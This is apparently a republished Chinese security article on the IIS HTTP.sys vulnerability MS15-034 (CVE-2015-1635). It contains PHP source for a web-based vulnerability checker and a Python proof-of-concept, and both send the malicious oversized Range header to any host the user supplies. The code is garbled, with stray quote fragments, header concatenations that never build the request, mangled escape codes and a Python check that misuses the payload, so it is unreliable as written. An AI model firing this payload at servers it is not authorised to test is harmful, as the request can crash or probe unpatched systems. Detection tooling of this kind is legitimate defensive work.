IIS最新高危漏洞POC及在线检测源码

安全 漏洞
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034)

IIS最新高危漏洞POC及在线检测源码

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。https://technet.microsoft.com/zh-cn/library/security/MS15-034

在线检测源码

IIS最新高危漏洞POC及在线检测源码 

  1. <?php 
  2.  
  3.  
  4. class VulnStatus  
  5. {  
  6. const FAIL        = 0;  
  7. const VULN        = 1;  
  8. const VULN_NOT_MS = 2;  
  9. const PATCHED     = 3;  
  10. const NOT_VULN    = 4;  
  11. const NOT_VULN_MS = 5;  
  12. const NOT_VULN_CF = 6;  
  13.  
  14. public static function AsString( $status, $host )  
  15. {  
  16. switch( $status )  
  17. {  
  18. case self::FAIL       : return ';<div class="alert alert-warning">无法连接到 <b>'; . $host . ';</b> 测试漏洞。</div>';;  
  19. case self::VULN       : return ';<div class="alert alert-danger"><b>'; . $host . ';</b> 存在漏洞。</div>';;  
  20. case self::VULN_NOT_MS: return ';<div class="alert alert-warning"><b>'; . $host . ';</b> 可能存在漏洞,但它好像没使用IIS。</div>';;  
  21. case self::PATCHED    : return ';<div class="alert alert-success"><b>'; . $host . ';</b> 已修复。</div>';;  
  22. case self::NOT_VULN   : return ';<div class="alert alert-info">不能识别补丁状态 <b>'; . $host . ';</b>, 并没有使用IIS,可能不存在漏洞。</div>';;  
  23. case self::NOT_VULN_MS: return ';<div class="alert alert-info">不能识别补丁状态 <b>'; . $host . ';</b>. 可能不存在漏洞。</div>';;  
  24. case self::NOT_VULN_CF: return ';<div class="alert alert-success"><b>'; . $host . ';</b> 可能使用了CloudFlare CDN加速,导致漏洞无法检测或不存在。</div>';;  
  25. }  
  26.  
  27. return ';好像坏了';;  
  28. }  
  29. }  
  30.  
  31. $host = false;  
  32. $status = false;  
  33. $url = filter_input( INPUT_GET, ';host';, FILTER_SANITIZE_URL );  
  34.  
  35. if( !empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null )  
  36. {  
  37. $url = ';http://'; . $url;  
  38. }  
  39.  
  40. $port = parse_url( $url, PHP_URL_PORT );  
  41.  
  42. if( $port === null )  
  43. {  
  44. $port = 80;  
  45. }  
  46.  
  47. $url = parse_url( $url, PHP_URL_HOST );  
  48.  
  49. if( $url !== null )  
  50. {  
  51. $cachekey = ';ms15034_'; . $url . ';_'; . $port;  
  52. $cachetime = 300; // 5 minutes  
  53.  
  54. $host = htmlspecialchars( $url, ENT_HTML5 );  
  55.  
  56. if( $port !== 80 )  
  57. {  
  58. $host .';:'; . $port;  
  59. }  
  60.  
  61. $memcached = new Memcached( );  
  62. $memcached->addServer( ';/var/run/memcached/memcached.sock';, 0 );  
  63.  
  64. $status = $memcached->get( $cachekey );  
  65.  
  66. if( $status === false )  
  67. {  
  68. $fp = @fsockopen( $url, $port, $errno, $errstr, 5 );  
  69.  
  70. if( $fp === false )  
  71. {  
  72. $status = VulnStatus::FAIL;  
  73. }  
  74. else  
  75. {  
  76. stream_set_timeout( $fp, 5 );  
  77.  
  78. $header = "GET / HTTP/1.1\r\n";  
  79. $header ."Host: stuff\r\n";  
  80. $header ."Range: bytes=0-18446744073709551615\r\n";  
  81. $header ."Connection: close\r\n\r\n";  
  82.  
  83. fwrite( $fp, $header );  
  84.  
  85. $response = fread( $fp, 1024 );  
  86.  
  87. fclose( $fp );  
  88.  
  89. if( strpos( $response, ';您的请求范围不符合'; ) !== false )  
  90. {  
  91. $status = strpos( $response, ';Microsoft'; ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;  
  92. }  
  93. else if( strpos( $response, ';请求一个无效的header头部'; ) !== false )  
  94. {  
  95. $cachetime = 3600; // 缓存时间  
  96. $status = VulnStatus::PATCHED;  
  97. }  
  98. else if( strpos( $response, ';Microsoft'; ) === false )  
  99. {  
  100. if( strpos( $response, ';403 Forbidden'; ) !== false && strpos( $response, ';cloudflare-nginx'; ) !== false )  
  101. {  
  102. $status = VulnStatus::NOT_VULN_CF;  
  103. }  
  104. else  
  105. {  
  106. $status = VulnStatus::NOT_VULN;  
  107. }  
  108. }  
  109. else  
  110. {  
  111. $status = VulnStatus::NOT_VULN_MS;  
  112. }  
  113. }  
  114.  
  115. unset( $fp, $header, $response );  
  116.  
  117. $memcached->set( $cachekey, $status, $cachetime );  
  118. }  
  119.  
  120. $status = VulnStatus::AsString( $status, $host );  
  121. }  
  122. ?> 
  123. <!DOCTYPE HTML> 
  124. <html> 
  125. <head> 
  126. <meta charset="utf-8"> 
  127. <meta name="theme-color" content="#424242"> 
  128. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> 
  129. <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  130.  
  131. <title>MS15-034 测试</title> 
  132.  
  133. <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet"> 
  134.  
  135. <style type="text/css"> 
  136. .container {  
  137. max-width: 900px;  
  138. }  
  139.  
  140. .masthead {  
  141. position: relative;  
  142. padding: 20px 0;  
  143. text-align: center;  
  144. color: #fff;  
  145. background-color: #424242;  
  146. margin-bottom: 20px;  
  147. }  
  148.  
  149. .masthead a {  
  150. color: #fff;  
  151. }  
  152.  
  153. .footer {  
  154. text-align: center;  
  155. padding: 15px;  
  156. color: #555;  
  157. }  
  158.  
  159. .footer span {  
  160. color: #FA5994;  
  161. }  
  162.  
  163. .form-inline {  
  164. text-align: center;  
  165. margin-bottom: 20px;  
  166. }  
  167.  
  168. .github {  
  169. position: absolute;  
  170. top: 0;  
  171. right: 0;  
  172. }  
  173. </style> 
  174. </head> 
  175. <body> 
  176. <div> 
  177. <div> 
  178. <h1>HTTP.sys 堆栈漏洞测试</h1> 
  179. <h3>输入一个URL或主机名来测试服务器的 <a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-034</a> / <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2015-1635</a>.</h3> 
  180. </div> 
  181. </div> 
  182.  
  183.  
  184.  
  185. <div> 
  186. <blockquote> 
  187. <p>在HTTP协议栈(HTTP.sys)造成当HTTP协议堆栈不正确地分析特制的HTTP请求的远程代码执行漏洞。成功利用此漏洞谁的攻击者可以在系统帐户的上下文中执行任意代码。</p> 
  188. <p>要利用此漏洞,攻击者必须发送一个特制的HTTP请求发送到受影响的系统。此更新通过修改Windows HTTP协议栈处理请求解决该漏洞。</p> 
  189. </blockquote> 
  190.  
  191. <form id="js-form" method="GET"> 
  192. <div> 
  193. <input type="text" class="form-control input-lg" id="js-input" placeholder="baidu.com" name="host" autofocus<?php if( $host !== false ) { echo '; value="'; . $host . ';"';; } ?>> 
  194. <button type="submit" class="btn btn-primary btn-lg">检测</button> 
  195. </div> 
  196. </form> 
  197.  
  198. <?php if( $status !== false ) { echo $status; } ?> 
  199.  
  200. <div>使用Memcached分布式内存对象缓存系统 | 所有的结果查询会被缓存五分钟</div> 
  201. </div> 
  202. </body> 
  203. </html> 

漏洞验证POC

python版

  1. #!/usr/bin/env python  
  2. __author__ = ';jastra';  
  3. class bg_colors:  
  4.     VULN = ';33[92m';  
  5.     NONVULN= ';33[95m';  
  6.     EXPLOIT = ';33[91m';    
  7. try:  
  8.     import requests  
  9.     import re  
  10. except ImportError as ierr:  
  11.     print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)  
  12.       
  13. def identify_iis(domain):  
  14.     req = requests.get(str(domain))  
  15.     remote_server = req.headers[';server';]  
  16.           
  17.     if "Microsoft-IIS" in remote_server:  
  18.         print(bg_colors.VULN + "[+] 服务是 " + remote_server)   
  19.         ms15_034_test(str(domain))  
  20.     else:  
  21.         print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)   
  22.           
  23. def ms15_034_test(domain):  
  24.     print(" 启动vuln检查!")  
  25.     vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";  
  26.     req = requests.get(str(domain), params=vuln_buffer)  
  27.     if req.headers[';content';] == "请求范围不符合":  
  28.         print(bg_colors.EXPLOIT + "[+] 存在漏洞")  
  29.     else:  
  30.         print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. "+  
  31.                "需要手动检测")  
  32. usr_domain = raw_input("输入域名扫描: ")  
  33. identify_iis(usr_domain) 

 

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2009-02-04 11:24:12

2015-07-13 09:18:20

2022-03-09 13:25:21

脏管道Linux 内核漏洞

2011-03-21 10:46:04

2013-07-18 15:09:27

2022-05-27 12:51:46

漏洞VMware攻击者

2013-07-11 09:25:49

2023-11-08 13:34:13

2020-03-25 09:40:57

微软浏览器Windows

2023-04-07 09:12:11

2021-11-10 11:51:33

BrakTooth安全漏洞蓝牙设备

2012-03-12 17:23:45

2011-08-15 15:41:29

2020-11-04 14:55:06

谷歌GitHub漏洞

2013-04-17 10:01:52

jwplayerXSS漏洞

2015-04-20 00:01:48

2023-04-12 21:28:40

2016-11-08 19:44:08

2010-04-30 15:45:09

2013-02-22 13:39:57

点赞
收藏

51CTO技术栈公众号